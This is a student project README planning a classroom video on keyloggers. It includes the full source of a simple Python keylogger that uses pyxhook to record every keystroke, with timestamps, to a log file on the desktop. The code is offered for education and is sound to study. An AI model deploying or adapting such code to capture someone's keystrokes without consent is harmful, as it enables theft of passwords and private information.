nuhcole/Keymaster/README.md

 Our end will result will be an informative video presentation outlining our research.
 The presentation will outline our research on keyloggers. the steps we took to create our own, uses of keyloggers, and actions one can take against keyloggers.
 Roles: Nicole Iovino (Group Leader, Video editor), Luis Calderon (Scripting Examples Presentation), O'Shayia Langston (Ethical Uses of Keylogger), Xiong Zheng (Malware/Unethical Uses).
 Each team member will have a slide presenting a part of our groups overall research and created tools.
 The video will be between 3:00 - 5:00 minutes in length and displayed to our fellow classmates upon graduation.

-Source Code:

-#! /usr/bin/env python3
-import os
-import logging
-import pyxhook
-# Set the path to the log file, using the pylogger_file environment variable if available
-# Otherwise, use the default path ~/Desktop/file.log
-log_file = os.environ.get('pylogger_file', os.path.expanduser('~/Desktop/file.log'))
-# Set the log format to include the timestamp, and specify the format of the timestamp
-log_format = '%(asctime)s - %(message)s'
-datefmt = '%Y:%m:%d %H:%M:%S'
-# Configure the logging module with the log file path, log level, and log format
-logging.basicConfig(filename=log_file, level=logging.INFO, format=log_format, datefmt=datefmt)
-# This function will be called every time a key is pressed, and will log the key that was pressed
-def OnKeyPress(event):
-    logging.info(event.Key)
-# Create an instance of the HookManager class from pyxhook
-new_hook = pyxhook.HookManager()
-# Set the KeyDown event to trigger the OnKeyPress function
-new_hook.KeyDown = OnKeyPress
-# Start the keylogger by calling HookKeyboard() on the HookManager instance
-new_hook.HookKeyboard()
-# Enter the event listener loop, which will keep the program running until it is stopped
-new_hook.start()